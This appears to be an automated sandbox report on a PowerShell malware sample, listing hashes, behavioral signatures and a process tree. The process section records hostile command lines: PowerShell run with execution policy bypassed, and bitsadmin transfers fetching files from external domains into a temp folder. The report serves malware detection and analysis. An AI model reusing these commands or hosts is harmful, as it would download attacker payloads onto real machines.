Overview
overview
10Static
static
1WyChVIlbg/...Zb.ps1
windows7-x64
10WyChVIlbg/...Zb.ps1
windows10-2004-x64
10WyChVIlbg/...Zb.vbs
windows7-x64
1WyChVIlbg/...Zb.vbs
windows10-2004-x64
1WyChVIlbg/main.sh
windows7-x64
3WyChVIlbg/main.sh
windows10-2004-x64
3WyChVIlbg/sleep.sh
windows7-x64
3WyChVIlbg/sleep.sh
windows10-2004-x64
3WyChVIlbg/...Zb.ps1
windows7-x64
10WyChVIlbg/...Zb.ps1
windows10-2004-x64
10WyChVIlbg/...Zb.vbs
windows7-x64
1WyChVIlbg/...Zb.vbs
windows10-2004-x64
1WyChVIlbg/main.sh
windows7-x64
3WyChVIlbg/main.sh
windows10-2004-x64
3WyChVIlbg/sleep.sh
windows7-x64
3WyChVIlbg/sleep.sh
windows10-2004-x64
3Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 11:59
Static task
static1
Behavioral task
behavioral1
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
WyChVIlbg/main.sh
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
WyChVIlbg/main.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
WyChVIlbg/sleep.sh
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
WyChVIlbg/sleep.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
WyChVIlbg/main.sh
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
WyChVIlbg/main.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
WyChVIlbg/sleep.sh
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
WyChVIlbg/sleep.sh
Resource
win10v2004-20241007-en
General
-
Target
WyChVIlbg/UaqyTpZb.ps1
-
Size
2KB
-
MD5
8540f5e40048f2e57fb5e2df66dbfe87
-
SHA1
eb038fd0f3e8bf11fdd16935de73ccf41d0331fd
-
SHA256
7005d74259760c7cc54a73e1c52cd8f7ff4aa641dac00fba952bc11d6557aae5
-
SHA512
b9555215dee32445c78a8138c885a5bb496dbd88d5d6f3037b9c427444fecb1cee0c5a2e3a23911f20ad2270f4e637725fbfae6cd19de5f8116924b817eba754
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2844 3040 bitsadmin.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1592 3040 bitsadmin.exe 31 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 2844 bitsadmin.exe 1592 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 2232 powershell.exe 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2232 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 2232 wrote to memory of 2744 2232 powershell.exe 32 PID 2232 wrote to memory of 2744 2232 powershell.exe 32 PID 2232 wrote to memory of 2744 2232 powershell.exe 32 PID 2232 wrote to memory of 2616 2232 powershell.exe 34 PID 2232 wrote to memory of 2616 2232 powershell.exe 34 PID 2232 wrote to memory of 2616 2232 powershell.exe 34
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\UaqyTpZb.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table2⤵PID:2744
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset2⤵PID:2616
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer aTOieb /priority FOREGROUND "https://yjtyhm13.eu/topic//0da7da84c68800837a7a42a04d2cb6c3.html" C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\0_taskhost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2844
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer bsAtHG /priority FOREGROUND "https://nmhholiut13.eu/topic//0da7da84c68800837a7a42a04d2cb6c3.html" C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\1_taskhost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:1592